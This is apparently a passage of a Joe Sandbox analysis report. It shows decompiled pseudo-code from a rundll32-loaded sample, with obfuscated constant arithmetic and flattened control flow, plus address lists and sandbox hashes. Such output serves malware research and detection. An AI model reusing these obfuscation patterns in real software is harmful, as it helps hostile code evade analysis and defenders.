				_v1600 = _v1600 | 0xeb4b5744;
				_v1600 = _v1600 ^ 0xeb54c7c0;
				_v1652 = 0x1784b1;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 << 6;
				_v1652 = _v1652 ^ 0x00082079;
				_v1660 = 0xec7770;
				_v1660 = _v1660 + 0xb190;
				_v1660 = _v1660 | 0x400c0cca;
				_v1660 = _v1660 ^ 0x40ee2104;
				_v1668 = 0xfc9259;
				_v1668 = _v1668 + 0xffffc6b7;
				_v1668 = _v1668 >> 0xe;
				_v1668 = _v1668 ^ 0x000f272a;
				_v1704 = 0xff7fae;
				_v1704 = _v1704 + 0xffff711f;
				_v1704 = _v1704 + 0xffff4b94;
				_v1704 = _v1704 | 0x5a3393fe;
				_v1704 = _v1704 ^ 0x5af53198;
				_v1616 = 0x130067;
				_t534 = 0x4e;
				_v1616 = _v1616 / _t534;
				_v1616 = _v1616 ^ 0x00057283;
				_v1628 = 0x10552;
				_v1628 = _v1628 + 0xf3cd;
				_v1628 = _v1628 + 0x9e6e;
				_v1628 = _v1628 ^ 0x00033ec8;
				_v1636 = 0x95cc92;
				_v1636 = _v1636 >> 0xf;
				_v1636 = _v1636 + 0x9761;
				_v1636 = _v1636 ^ 0x000e6713;
				_v1748 = 0xd7b406;
				_t535 = 0x31;
				_v1748 = _v1748 * 0x46;
				_v1748 = _v1748 << 1;
				_v1748 = _v1748 + 0x479a;
				_v1748 = _v1748 ^ 0x75ff50ef;
				_v1584 = 0xe29275;
				_v1584 = _v1584 * 0x6d;
				_v1584 = _v1584 ^ 0x607f0d3c;
				_v1664 = 0xc2b99a;
				_v1664 = _v1664 / _t605;
				_v1664 = _v1664 | 0xc7d1021c;
				_v1664 = _v1664 ^ 0xc7dc1815;
				_v1692 = 0xa5d2da;
				_v1692 = _v1692 * 0x17;
				_v1692 = _v1692 / _t535;
				_t536 = 0x23;
				_v1692 = _v1692 * 0x3a;
				_v1692 = _v1692 ^ 0x11a891cb;
				_v1656 = 0x680db3;
				_v1656 = _v1656 >> 6;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 ^ 0x000507e8;
				_v1728 = 0x12970f;
				_v1728 = _v1728 + 0xffffbe66;
				_v1728 = _v1728 >> 6;
				_v1728 = _v1728 / _t536;
				_v1728 = _v1728 ^ 0x00053169;
				_v1620 = 0xa87d1b;
				_v1620 = _v1620 + 0xc3ba;
				_v1620 = _v1620 ^ 0x00a7b1ac;
				_v1736 = 0xb206b7;
				_v1736 = _v1736 ^ 0x6f4eb888;
				_t537 = 0x5d;
				_v1736 = _v1736 / _t537;
				_v1736 = _v1736 + 0x173b;
				_v1736 = _v1736 ^ 0x013191a0;
				_v1744 = 0xbf67a7;
				_t538 = 0x70;
				_v1744 = _v1744 / _t538;
				_v1744 = _v1744 | 0x1279871b;
				_v1744 = _v1744 ^ 0x04c3b9b8;
				_v1744 = _v1744 ^ 0x16b0fef0;
				_v1588 = 0x7bc48a;
				_v1588 = _v1588 << 7;
				_v1588 = _v1588 ^ 0x3de90636;
				_v1688 = 0x5dc5eb;
				_v1688 = _v1688 >> 0xb;
				_v1688 = _v1688 + 0xaf87;
				_t539 = 0x6c;
				_t522 = _v1568;
				_v1688 = _v1688 * 0x63;
				_v1688 = _v1688 ^ 0x004fac27;
				_v1696 = 0x311285;
				_v1696 = _v1696 << 0xb;
				_v1696 = _v1696 ^ 0x3061b352;
				_v1696 = _v1696 / _t539;
				_v1696 = _v1696 ^ 0x01b73771;
				_v1592 = 0x977507;
				_v1592 = _v1592 | 0xf9843f0d;
				_v1592 = _v1592 ^ 0xf99a58c3;
				while(1) {
					L1:
					_t540 = 0x5c;
					while(1) {
						L2:
						_t500 = 0x8167d85;
						do {
							L3:
							if(_t603 == 0x2c7b186) {
								E00681FD1(_v1688, _v1696, _v1592, _v1564);
								_t603 = 0xcf98960;
								goto L18;
							} else {
								if(_t603 == 0x33b45b1) {
									_push(_v1680);
									_push(_v1720);
									_t502 = E0069DCF7(_v1684, 0x681080, __eflags);
									_pop(_t546);
									__eflags = E0068AAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
									E0068A8B0(_v1628, _t502, _v1636);
									_t609 =  &(_t609[0xf]);
									L18:
									_t500 = 0x8167d85;
									_t540 = 0x5c;
								} else {
									if(_t603 == _t500) {
										_t509 = E0068F002(2 + E0068CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E0068CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
										_t609 =  &(_t609[0xd]);
										__eflags = _t509;
										_t603 = 0x2c7b186;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t603 == 0x9805d0a) {
											_push(_v1672);
											_push(_v1648);
											_push(_v1580);
											_push( &_v520);
											E006946BB(_v1596, _v1724);
											_t609 = _t609 - 0xc + 0x1c;
											_t603 = 0xc81d40c;
											while(1) {
												L1:
												_t540 = 0x5c;
												goto L2;
											}
										} else {
											if(_t603 == 0xaea35f7) {
												_t523 =  *0x6a3e10; // 0x0
												_t524 = _t523 + 0x1c;
												while(1) {
													__eflags =  *_t524 - _t540;
													if(__eflags == 0) {
														break;
													}
													_t524 = _t524 + 2;
													__eflags = _t524;
												}
												_t522 = _t524 + 2;
												_t603 = 0x33b45b1;
												goto L2;
											} else {
												_t618 = _t603 - 0xc81d40c;
												if(_t603 == 0xc81d40c) {
													_push(_v1612);
													_push(_v1572);
													_t513 = E0069DCF7(_v1624, 0x681020, _t618);
													E0069176B( &_v1040, _t618);
													_t556 =  *0x6a3e10; // 0x0
													_t403 = _t556 + 0x1c; // 0x1c
													_t404 = _t556 + 0x23c; // 0x23c
													E00691652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
													E0068A8B0(_v1604, _t513, _v1576);
													_t609 =  &(_t609[0xf]);
													_t603 = 0xaea35f7;
													while(1) {
														L1:
														_t540 = 0x5c;
														L2:
														_t500 = 0x8167d85;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _t603 - 0xcf98960;
						} while (__eflags != 0);
						return _v1568;
					}
				}
			}

















































































                                                                                                                      0x006a0056
                                                                                                                      0x006a005c
                                                                                                                      0x006a0066
                                                                                                                      0x006a006d
                                                                                                                      0x006a0075
                                                                                                                      0x006a007d
                                                                                                                      0x006a0088
                                                                                                                      0x006a0093
                                                                                                                      0x006a009e
                                                                                                                      0x006a00a6
                                                                                                                      0x006a00ab
                                                                                                                      0x006a00b3
                                                                                                                      0x006a00bb
                                                                                                                      0x006a00c3
                                                                                                                      0x006a00cf
                                                                                                                      0x006a00d6
                                                                                                                      0x006a00e4
                                                                                                                      0x006a00e9
                                                                                                                      0x006a00fa
                                                                                                                      0x006a00fd
                                                                                                                      0x006a0104
                                                                                                                      0x006a010f
                                                                                                                      0x006a011a
                                                                                                                      0x006a0122
                                                                                                                      0x006a012d
                                                                                                                      0x006a013a
                                                                                                                      0x006a0143
                                                                                                                      0x006a0147
                                                                                                                      0x006a014b
                                                                                                                      0x006a0153
                                                                                                                      0x006a015e
                                                                                                                      0x006a0169
                                                                                                                      0x006a0174
                                                                                                                      0x006a0184
                                                                                                                      0x006a0188
                                                                                                                      0x006a018d
                                                                                                                      0x006a0195
                                                                                                                      0x006a01a7
                                                                                                                      0x006a01ac
                                                                                                                      0x006a01b5
                                                                                                                      0x006a01c0
                                                                                                                      0x006a01d2
                                                                                                                      0x006a01d7
                                                                                                                      0x006a01e0
                                                                                                                      0x006a01eb
                                                                                                                      0x006a01fd
                                                                                                                      0x006a0202
                                                                                                                      0x006a020b
                                                                                                                      0x006a0216
                                                                                                                      0x006a0228
                                                                                                                      0x006a022b
                                                                                                                      0x006a0237
                                                                                                                      0x006a023c
                                                                                                                      0x006a0245
                                                                                                                      0x006a0250
                                                                                                                      0x006a025d
                                                                                                                      0x006a0260
                                                                                                                      0x006a0264
                                                                                                                      0x006a026c
                                                                                                                      0x006a0274
                                                                                                                      0x006a027c
                                                                                                                      0x006a0284
                                                                                                                      0x006a028c
                                                                                                                      0x006a0294
                                                                                                                      0x006a029c
                                                                                                                      0x006a02a4
                                                                                                                      0x006a02ac
                                                                                                                      0x006a02b0
                                                                                                                      0x006a02b5
                                                                                                                      0x006a02ba
                                                                                                                      0x006a02c2
                                                                                                                      0x006a02ce
                                                                                                                      0x006a02d3
                                                                                                                      0x006a02d9
                                                                                                                      0x006a02e1
                                                                                                                      0x006a02e9
                                                                                                                      0x006a02f1
                                                                                                                      0x006a02f9
                                                                                                                      0x006a0305
                                                                                                                      0x006a0308
                                                                                                                      0x006a030c
                                                                                                                      0x006a0314
                                                                                                                      0x006a031c
                                                                                                                      0x006a0324
                                                                                                                      0x006a032c
                                                                                                                      0x006a0331
                                                                                                                      0x006a0339
                                                                                                                      0x006a0341
                                                                                                                      0x006a034c
                                                                                                                      0x006a0357
                                                                                                                      0x006a0362
                                                                                                                      0x006a036d
                                                                                                                      0x006a0378
                                                                                                                      0x006a0383
                                                                                                                      0x006a0390
                                                                                                                      0x006a0399
                                                                                                                      0x006a039d
                                                                                                                      0x006a03a5
                                                                                                                      0x006a03ad
                                                                                                                      0x006a03b7
                                                                                                                      0x006a03bb
                                                                                                                      0x006a03c3
                                                                                                                      0x006a03cb
                                                                                                                      0x006a03d3
                                                                                                                      0x006a03d8
                                                                                                                      0x006a03dd
                                                                                                                      0x006a03e5
                                                                                                                      0x006a03ed
                                                                                                                      0x006a03f2
                                                                                                                      0x006a03f7
                                                                                                                      0x006a03ff
                                                                                                                      0x006a040a
                                                                                                                      0x006a0415
                                                                                                                      0x006a0422
                                                                                                                      0x006a042a
                                                                                                                      0x006a042f
                                                                                                                      0x006a0434
                                                                                                                      0x006a043c
                                                                                                                      0x006a0444
                                                                                                                      0x006a044c
                                                                                                                      0x006a0454
                                                                                                                      0x006a045c
                                                                                                                      0x006a0464
                                                                                                                      0x006a046c
                                                                                                                      0x006a0471
                                                                                                                      0x006a0479
                                                                                                                      0x006a0481
                                                                                                                      0x006a0489
                                                                                                                      0x006a0491
                                                                                                                      0x006a0499
                                                                                                                      0x006a04a1
                                                                                                                      0x006a04b5
                                                                                                                      0x006a04ba
                                                                                                                      0x006a04c1
                                                                                                                      0x006a04cc
                                                                                                                      0x006a04d7
                                                                                                                      0x006a04e2
                                                                                                                      0x006a04ed
                                                                                                                      0x006a04f8
                                                                                                                      0x006a0503
                                                                                                                      0x006a050b
                                                                                                                      0x006a0516
                                                                                                                      0x006a0521
                                                                                                                      0x006a0530
                                                                                                                      0x006a0533
                                                                                                                      0x006a0537
                                                                                                                      0x006a053b
                                                                                                                      0x006a0543
                                                                                                                      0x006a054b
                                                                                                                      0x006a055e
                                                                                                                      0x006a0565
                                                                                                                      0x006a0570
                                                                                                                      0x006a0580
                                                                                                                      0x006a0584
                                                                                                                      0x006a058c
                                                                                                                      0x006a0594
                                                                                                                      0x006a05a1
                                                                                                                      0x006a05ad
                                                                                                                      0x006a05b6
                                                                                                                      0x006a05b7
                                                                                                                      0x006a05bb
                                                                                                                      0x006a05c3
                                                                                                                      0x006a05cb
                                                                                                                      0x006a05d0
                                                                                                                      0x006a05d5
                                                                                                                      0x006a05dd
                                                                                                                      0x006a05e5
                                                                                                                      0x006a05ed
                                                                                                                      0x006a05f8
                                                                                                                      0x006a05fc
                                                                                                                      0x006a0604
                                                                                                                      0x006a060f
                                                                                                                      0x006a061a
                                                                                                                      0x006a0625
                                                                                                                      0x006a062d
                                                                                                                      0x006a0642
                                                                                                                      0x006a0647
                                                                                                                      0x006a064d
                                                                                                                      0x006a0655
                                                                                                                      0x006a065d
                                                                                                                      0x006a0669
                                                                                                                      0x006a066e
                                                                                                                      0x006a0674
                                                                                                                      0x006a067c
                                                                                                                      0x006a0684
                                                                                                                      0x006a068c
                                                                                                                      0x006a0697
                                                                                                                      0x006a069f
                                                                                                                      0x006a06aa
                                                                                                                      0x006a06b2
                                                                                                                      0x006a06b7
                                                                                                                      0x006a06c4
                                                                                                                      0x006a06c5
                                                                                                                      0x006a06cc
                                                                                                                      0x006a06d0
                                                                                                                      0x006a06d8
                                                                                                                      0x006a06e0
                                                                                                                      0x006a06e5
                                                                                                                      0x006a06f3
                                                                                                                      0x006a06f7
                                                                                                                      0x006a06ff
                                                                                                                      0x006a070a
                                                                                                                      0x006a0715
                                                                                                                      0x006a0720
                                                                                                                      0x006a0720
                                                                                                                      0x006a0722
                                                                                                                      0x006a0723
                                                                                                                      0x006a0723
                                                                                                                      0x006a0723
                                                                                                                      0x006a0728
                                                                                                                      0x006a0728
                                                                                                                      0x006a072e
                                                                                                                      0x006a098a
                                                                                                                      0x006a0991
                                                                                                                      0x00000000
                                                                                                                      0x006a0734
                                                                                                                      0x006a073a
                                                                                                                      0x006a08ea
                                                                                                                      0x006a08f3
                                                                                                                      0x006a08fb
                                                                                                                      0x006a0901
                                                                                                                      0x006a095c
                                                                                                                      0x006a0967
                                                                                                                      0x006a096a
                                                                                                                      0x006a096f
                                                                                                                      0x006a0993
                                                                                                                      0x006a0995
                                                                                                                      0x006a099a
                                                                                                                      0x006a0740
                                                                                                                      0x006a0742
                                                                                                                      0x006a08ca
                                                                                                                      0x006a08d1
                                                                                                                      0x006a08d4
                                                                                                                      0x006a08d6
                                                                                                                      0x006a08de
                                                                                                                      0x00000000
                                                                                                                      0x006a0748
                                                                                                                      0x006a074e
                                                                                                                      0x006a0831
                                                                                                                      0x006a083c
                                                                                                                      0x006a0840
                                                                                                                      0x006a0855
                                                                                                                      0x006a0856
                                                                                                                      0x006a085b
                                                                                                                      0x006a085e
                                                                                                                      0x006a0720
                                                                                                                      0x006a0720
                                                                                                                      0x006a0722
                                                                                                                      0x00000000
                                                                                                                      0x006a0722
                                                                                                                      0x006a0754
                                                                                                                      0x006a075a
                                                                                                                      0x006a0811
                                                                                                                      0x006a0817
                                                                                                                      0x006a081f
                                                                                                                      0x006a081f
                                                                                                                      0x006a0822
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006a081c
                                                                                                                      0x006a081c
                                                                                                                      0x006a081c
                                                                                                                      0x006a0824
                                                                                                                      0x006a0827
                                                                                                                      0x00000000
                                                                                                                      0x006a0760
                                                                                                                      0x006a0760
                                                                                                                      0x006a0766
                                                                                                                      0x006a076c
                                                                                                                      0x006a0778
                                                                                                                      0x006a0786
                                                                                                                      0x006a0794
                                                                                                                      0x006a07cb
                                                                                                                      0x006a07d8
                                                                                                                      0x006a07dc
                                                                                                                      0x006a07ea
                                                                                                                      0x006a07ff
                                                                                                                      0x006a0804
                                                                                                                      0x006a0807
                                                                                                                      0x006a0720
                                                                                                                      0x006a0720
                                                                                                                      0x006a0722
                                                                                                                      0x006a0723
                                                                                                                      0x006a0723
                                                                                                                      0x00000000
                                                                                                                      0x006a0723
                                                                                                                      0x006a0720
                                                                                                                      0x006a0766
                                                                                                                      0x006a075a
                                                                                                                      0x006a074e
                                                                                                                      0x006a0742
                                                                                                                      0x006a073a
                                                                                                                      0x006a099b
                                                                                                                      0x006a099b
                                                                                                                      0x006a09b4
                                                                                                                      0x006a09b4
                                                                                                                      0x006a0723

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Agz$DWK$E+A$g$pw
                                                                                                                      • API String ID: 0-1474679353
                                                                                                                      • Opcode ID: 721e80792fbc42e17180adc1f357c3f6fccc0e7495edaa3617d162a1b748a681
                                                                                                                      • Instruction ID: 0449a55c76ad5af72009fae5e57894860d09eb7d415477bcea2a9e3541495e57
                                                                                                                      • Opcode Fuzzy Hash: 721e80792fbc42e17180adc1f357c3f6fccc0e7495edaa3617d162a1b748a681
                                                                                                                      • Instruction Fuzzy Hash: AF32127250C3808FE368CF25C94AA8BFBF2BBC5748F10891DE19986261D7B59949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068F09B Relevance: 6.6, Strings: 5, Instructions: 359COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E0068F09B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t425;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t458;
				void* _t502;
				void* _t503;
				signed int* _t507;

				_t507 =  &_v2772;
				_v2628 = 0x98f0ce;
				_v2628 = _v2628 >> 0xb;
				_v2628 = _v2628 ^ 0x00001337;
				_v2696 = 0x96ddc1;
				_v2696 = _v2696 + 0xffff0eed;
				_v2696 = _v2696 + 0xffffc9f2;
				_v2696 = _v2696 ^ 0x009155bb;
				_v2748 = 0x5205ca;
				_v2748 = _v2748 ^ 0x19402ba5;
				_t502 = __ecx;
				_t503 = 0xea1969c;
				_t443 = 0x43;
				_v2748 = _v2748 / _t443;
				_t444 = 0xb;
				_v2748 = _v2748 / _t444;
				_v2748 = _v2748 ^ 0x000a2456;
				_v2604 = 0x2f1706;
				_t445 = 0x26;
				_v2604 = _v2604 * 6;
				_v2604 = _v2604 ^ 0x011fcdd9;
				_v2684 = 0x108800;
				_v2684 = _v2684 >> 0xc;
				_v2684 = _v2684 / _t445;
				_v2684 = _v2684 ^ 0x00056909;
				_v2764 = 0x56ac6f;
				_v2764 = _v2764 << 0xe;
				_v2764 = _v2764 | 0x24a96f4c;
				_t446 = 0x42;
				_v2764 = _v2764 / _t446;
				_v2764 = _v2764 ^ 0x02abe6d6;
				_v2680 = 0xb60c61;
				_t447 = 0x16;
				_v2680 = _v2680 / _t447;
				_v2680 = _v2680 << 7;
				_v2680 = _v2680 ^ 0x04229d93;
				_v2712 = 0x6d1dcd;
				_v2712 = _v2712 | 0x18b294c6;
				_v2712 = _v2712 ^ 0xf88c4d23;
				_v2712 = _v2712 ^ 0xe07332c4;
				_v2612 = 0x9fb2e7;
				_v2612 = _v2612 | 0xd190ff6b;
				_v2612 = _v2612 ^ 0xd1908c6f;
				_v2732 = 0x85d89e;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 >> 0xd;
				_t448 = 0x37;
				_v2732 = _v2732 / _t448;
				_v2732 = _v2732 ^ 0x0009f3db;
				_v2704 = 0x8a2dac;
				_v2704 = _v2704 << 0xd;
				_v2704 = _v2704 * 6;
				_v2704 = _v2704 ^ 0xa2425f92;
				_v2620 = 0x8530c4;
				_v2620 = _v2620 | 0x7f36b61d;
				_v2620 = _v2620 ^ 0x7fb2adaf;
				_v2756 = 0xf61f4c;
				_v2756 = _v2756 >> 0xe;
				_t449 = 0x4b;
				_v2756 = _v2756 / _t449;
				_v2756 = _v2756 + 0xffffd188;
				_v2756 = _v2756 ^ 0xfff88f11;
				_v2660 = 0x7ee31b;
				_v2660 = _v2660 | 0xd8d04f1e;
				_v2660 = _v2660 ^ 0xd8ffeb88;
				_v2672 = 0xc71ff5;
				_v2672 = _v2672 >> 0xf;
				_v2672 = _v2672 ^ 0x000b63b3;
				_v2740 = 0x49f4c1;
				_t450 = 0x76;
				_v2740 = _v2740 * 0x4b;
				_v2740 = _v2740 + 0xffff254a;
				_v2740 = _v2740 * 0x48;
				_v2740 = _v2740 ^ 0x17c5e1bd;
				_v2652 = 0x2197ca;
				_v2652 = _v2652 * 0x5a;
				_v2652 = _v2652 ^ 0x0bc440cb;
				_v2720 = 0x771a3f;
				_v2720 = _v2720 >> 0xe;
				_v2720 = _v2720 + 0x9ab6;
				_v2720 = _v2720 ^ 0x0000c33a;
				_v2688 = 0x2271c;
				_v2688 = _v2688 / _t450;
				_v2688 = _v2688 << 9;
				_v2688 = _v2688 ^ 0x0000f5c5;
				_v2608 = 0xceafd9;
				_t451 = 0x5b;
				_v2608 = _v2608 / _t451;
				_v2608 = _v2608 ^ 0x00020c5c;
				_v2644 = 0x474c12;
				_v2644 = _v2644 + 0xffff00ab;
				_v2644 = _v2644 ^ 0x00446b0a;
				_v2760 = 0xca1d14;
				_t452 = 0x36;
				_v2760 = _v2760 / _t452;
				_v2760 = _v2760 ^ 0x098f5074;
				_v2760 = _v2760 ^ 0x8a27b7fe;
				_v2760 = _v2760 ^ 0x83afe7c4;
				_v2636 = 0x5d1272;
				_v2636 = _v2636 + 0xf4cf;
				_v2636 = _v2636 ^ 0x005057cd;
				_v2768 = 0x30e751;
				_v2768 = _v2768 | 0xcda5a365;
				_t453 = 5;
				_v2768 = _v2768 * 0x7d;
				_v2768 = _v2768 + 0xffff52f5;
				_v2768 = _v2768 ^ 0x71df24ad;
				_v2772 = 0x3d9f4c;
				_v2772 = _v2772 / _t453;
				_v2772 = _v2772 | 0x64d73223;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0x1935e4e1;
				_v2744 = 0xaeb35;
				_v2744 = _v2744 << 0x10;
				_v2744 = _v2744 + 0xffff2953;
				_v2744 = _v2744 + 0xffff82ad;
				_v2744 = _v2744 ^ 0xeb3966f5;
				_v2752 = 0x66dc67;
				_v2752 = _v2752 + 0x90a4;
				_v2752 = _v2752 + 0x6fc1;
				_v2752 = _v2752 ^ 0x6a9d4e17;
				_v2752 = _v2752 ^ 0x6af88c69;
				_v2716 = 0xce0c89;
				_v2716 = _v2716 ^ 0x42dcf22f;
				_v2716 = _v2716 | 0xbb0a480d;
				_v2716 = _v2716 ^ 0xfb186e5d;
				_v2616 = 0x5746b3;
				_v2616 = _v2616 | 0xa6a5976e;
				_v2616 = _v2616 ^ 0xa6f469a2;
				_v2708 = 0xa6d434;
				_v2708 = _v2708 << 0xa;
				_v2708 = _v2708 | 0x1b169a68;
				_v2708 = _v2708 ^ 0x9b5e88e0;
				_v2736 = 0x9f8594;
				_v2736 = _v2736 + 0xffffc5c7;
				_t454 = 9;
				_v2736 = _v2736 / _t454;
				_v2736 = _v2736 + 0xffff650c;
				_v2736 = _v2736 ^ 0x001c27e2;
				_v2668 = 0xeff616;
				_v2668 = _v2668 << 4;
				_v2668 = _v2668 ^ 0x0efcbcf0;
				_v2640 = 0x84564;
				_v2640 = _v2640 >> 9;
				_v2640 = _v2640 ^ 0x00099447;
				_v2648 = 0xb94e9c;
				_v2648 = _v2648 >> 7;
				_v2648 = _v2648 ^ 0x000c8381;
				_v2656 = 0x4f0029;
				_v2656 = _v2656 * 0x26;
				_v2656 = _v2656 ^ 0x0bb68559;
				_v2700 = 0xc64297;
				_v2700 = _v2700 << 0x10;
				_v2700 = _v2700 ^ 0xb6f38c4d;
				_v2700 = _v2700 ^ 0xf46a369f;
				_v2664 = 0x51e71d;
				_v2664 = _v2664 * 0xf;
				_v2664 = _v2664 ^ 0x04c73adc;
				_v2728 = 0xfedaba;
				_v2728 = _v2728 + 0xfffff930;
				_v2728 = _v2728 + 0xfffff3b0;
				_v2728 = _v2728 + 0xffff7b6e;
				_v2728 = _v2728 ^ 0x00f92d7b;
				_v2632 = 0xc4e34f;
				_t425 = _v2632 * 0x17;
				_v2632 = _t425;
				_v2632 = _v2632 ^ 0x11b64b79;
				_v2676 = 0x4fbb37;
				_v2676 = _v2676 + 0x433;
				_v2676 = _v2676 >> 1;
				_v2676 = _v2676 ^ 0x002442b0;
				_v2724 = 0xe01143;
				_v2724 = _v2724 | 0x0dc37ba2;
				_v2724 = _v2724 + 0xe020;
				_v2724 = _v2724 ^ 0x0dec213c;
				_v2624 = 0xd4ff52;
				_v2624 = _v2624 << 0xe;
				_v2624 = _v2624 ^ 0x3fd02267;
				_v2692 = 0xfd19e6;
				_v2692 = _v2692 + 0x8b9c;
				_v2692 = _v2692 | 0x5cbd23eb;
				_v2692 = _v2692 ^ 0x5cf129d9;
				while(_t503 != 0x5de06da) {
					if(_t503 == 0xea1969c) {
						_t503 = 0xfa9128f;
						continue;
					} else {
						_t515 = _t503 - 0xfa9128f;
						if(_t503 != 0xfa9128f) {
							L8:
							__eflags = _t503 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E0069DA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
							 *((short*)(E0068B6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
							E00688969(_v2612,  &_v1560, _t515, _v2732, _v2704);
							_push(_v2660);
							_push(_v2756);
							E006847CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E0069DCF7(_v2620, 0x681308, _t515),  &_v1560, _v2720, _v2688);
							E0068A8B0(_v2608, _t437, _v2644);
							_t454 = _v2760;
							_t425 = E0068EA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
							_t507 =  &(_t507[0x17]);
							if(_t425 != 0) {
								_t503 = 0x5de06da;
								continue;
							}
						}
					}
					return _t425;
				}
				_push(_v2616);
				_push(_v2628);
				_push(_v2716);
				_push( &_v1040);
				E006946BB(_v2744, _v2752);
				_push(_v2668);
				_push(_v2736);
				E006847CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E0069DCF7(_v2708, 0x681348, __eflags),  &_v2080, _v2700, _v2664);
				_t458 = _v2728;
				E0068A8B0(_t458, _t428, _v2632);
				_push(_v2692);
				_push(0);
				_push(_t458);
				_push(0);
				_push(0);
				_push(_v2624);
				_t454 = _v2676;
				_push( &_v520);
				_t425 = E0068AB87(_v2676, _v2724, __eflags);
				_t507 = _t507 - 0xc + 0x64;
				_t503 = 0xa8e801c;
				goto L8;
			}



































































                                                                                                                      0x0068f09b
                                                                                                                      0x0068f0a1
                                                                                                                      0x0068f0ae
                                                                                                                      0x0068f0b6
                                                                                                                      0x0068f0c1
                                                                                                                      0x0068f0c9
                                                                                                                      0x0068f0d1
                                                                                                                      0x0068f0d9
                                                                                                                      0x0068f0e1
                                                                                                                      0x0068f0e9
                                                                                                                      0x0068f0fa
                                                                                                                      0x0068f0fc
                                                                                                                      0x0068f101
                                                                                                                      0x0068f106
                                                                                                                      0x0068f110
                                                                                                                      0x0068f115
                                                                                                                      0x0068f11b
                                                                                                                      0x0068f123
                                                                                                                      0x0068f136
                                                                                                                      0x0068f139
                                                                                                                      0x0068f140
                                                                                                                      0x0068f14b
                                                                                                                      0x0068f153
                                                                                                                      0x0068f160
                                                                                                                      0x0068f164
                                                                                                                      0x0068f16c
                                                                                                                      0x0068f174
                                                                                                                      0x0068f179
                                                                                                                      0x0068f185
                                                                                                                      0x0068f18a
                                                                                                                      0x0068f190
                                                                                                                      0x0068f198
                                                                                                                      0x0068f1a4
                                                                                                                      0x0068f1a9
                                                                                                                      0x0068f1af
                                                                                                                      0x0068f1b4
                                                                                                                      0x0068f1bc
                                                                                                                      0x0068f1c4
                                                                                                                      0x0068f1cc
                                                                                                                      0x0068f1d4
                                                                                                                      0x0068f1dc
                                                                                                                      0x0068f1e7
                                                                                                                      0x0068f1f2
                                                                                                                      0x0068f1fd
                                                                                                                      0x0068f205
                                                                                                                      0x0068f20a
                                                                                                                      0x0068f213
                                                                                                                      0x0068f216
                                                                                                                      0x0068f21a
                                                                                                                      0x0068f222
                                                                                                                      0x0068f22a
                                                                                                                      0x0068f234
                                                                                                                      0x0068f238
                                                                                                                      0x0068f240
                                                                                                                      0x0068f24d
                                                                                                                      0x0068f258
                                                                                                                      0x0068f263
                                                                                                                      0x0068f26b
                                                                                                                      0x0068f276
                                                                                                                      0x0068f27b
                                                                                                                      0x0068f281
                                                                                                                      0x0068f289
                                                                                                                      0x0068f291
                                                                                                                      0x0068f29c
                                                                                                                      0x0068f2a7
                                                                                                                      0x0068f2b2
                                                                                                                      0x0068f2ba
                                                                                                                      0x0068f2bf
                                                                                                                      0x0068f2c7
                                                                                                                      0x0068f2d4
                                                                                                                      0x0068f2d7
                                                                                                                      0x0068f2db
                                                                                                                      0x0068f2e8
                                                                                                                      0x0068f2ec
                                                                                                                      0x0068f2f4
                                                                                                                      0x0068f307
                                                                                                                      0x0068f30e
                                                                                                                      0x0068f319
                                                                                                                      0x0068f321
                                                                                                                      0x0068f326
                                                                                                                      0x0068f32e
